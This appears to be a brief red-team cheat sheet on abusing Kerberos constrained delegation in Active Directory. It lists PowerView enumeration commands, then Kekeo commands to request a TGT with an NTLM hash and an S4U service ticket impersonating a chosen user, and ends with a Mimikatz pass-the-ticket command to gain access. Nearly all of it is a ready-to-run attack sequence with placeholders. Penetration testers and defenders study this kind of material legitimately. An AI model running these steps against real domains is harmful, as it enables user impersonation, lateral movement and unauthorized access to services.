# CONSTRAINED DELEGATION

Enumerate users with Constrained Delegation enabled

```
Get-DomainUser -TrustedToAuth
 
Get-DomainUser -TrustedToAuth | Select -ExpandProperty samaccountname

Get-DomainUser -TrustedToAuth | Select  samaccountname,useraccountcontrol
```

Using Kekeo to request a TGT for the constrained delegated service

```
tgt::ask /user:<CONSTRAINED SERVICE> /domain:<DOMAIN> /rc4:<NTLM>
```

Requesting a TGS for target service from our constrained service ticket

```
tgs::s4u /tgt:<TGT PATH> /user:<USERNAME> /service:<SPN>
```

Performing Pass The Ticket attack with mimikatz to gain access

```
Invoke-Mimikatz -Command '"kerberos::ptt <TGS PATH>"'
```